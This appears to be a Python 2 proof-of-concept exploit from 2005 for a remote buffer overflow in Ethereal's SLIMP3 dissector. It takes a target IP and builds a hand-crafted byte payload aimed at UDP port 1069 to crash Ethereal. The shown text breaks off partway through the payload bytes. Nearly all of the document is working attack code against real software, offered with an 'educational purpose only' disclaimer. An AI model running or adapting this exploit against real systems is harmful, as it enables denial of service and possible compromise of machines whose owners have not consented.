1 # ethereal_slimp3_bof.py
2 # Ethereal SLIMP3 Remote Buffer Overflow PoC
3 # Bug Discoverd by Vendor(?) 2005−10−19
4 # Coded by Sowhat
5 # http://secway.org
6 # 2005−10−20
7 # This PoC will crash the Ethereal
8 # Tested with Ethereal 0.10.12, WinPcap 3.1 beta4, WinXP SP2
9 # For educational purpose only, Use at your own risk!
10
11 # Version 0.9.1 to 0.10.12
12 # http://www.ethereal.com/docs/release−notes/ethereal−0.10.13.html
13 # "The SLIMP3 dissector could overflow a buffer. "
14
15 import sys
16 import string
17 import socket
18
19 if (len(sys.argv) != 2):
20
print " ##################################################################"
21
print " # #"
22
print " # Ethereal SLIMP3 Remote Buffer Overflow PoC #"
23
print " # Coded by Sowhat #"
24
print " # http://secway.org #"
25
print " ##################################################################"
26
print "\n Usage: " + sys.argv[0] + " TargetIP"
27
print " TargetIP should be any IP address Ethereal can reach"
28
sys.exit(0)
29
30 host = sys.argv[1]
31 port = 1069
32
33 victim = (host, port)
34
35 request = "\x6C\xC3\xB2\xA1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
36 request += "\xFF\xFF\x00\x00\x01\x00\x00\x00\x56\x57\xF7\x42\x5B\x6A\x04\x00"
37 request += "\x58\x01\x00\x00\x58\x01\x00\x00\x00\x04\x20\x04\x19\xA2\x00\x0C"
38 request += "\x6E\xE3\xB7\xC7\x08\x00\x45\x00\x01\x4A\xB4\x6C\x40\x00\x40\x11"
39 request += "\x03\x79\xC0\xA8\x00\x0A\xC0\xA8\x00\x63\x0D\x9B\x0D\x9B\x01\x36"
40 request += "\x83\x05\x6C\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
41 request += "\x20\x20\x20\x20\x02\x33\x02\x00\x02\x30\x03\x03\x02\x40\x03\x10"
42 request += "\x03\x10\x03\x10\x03\x10\x03\x10\x03\x10\x03\x10\x03\x00\x02\x58"
43 request += "\x03\x10\x03\x10\x03\x08\x03\x04\x03\x02\x03\x01\x03\x01\x03\x00"
44 request += "\x02\x60\x03\x7F\x03\x00\x03\x00\x03\x00\x03\x00\x03\x00\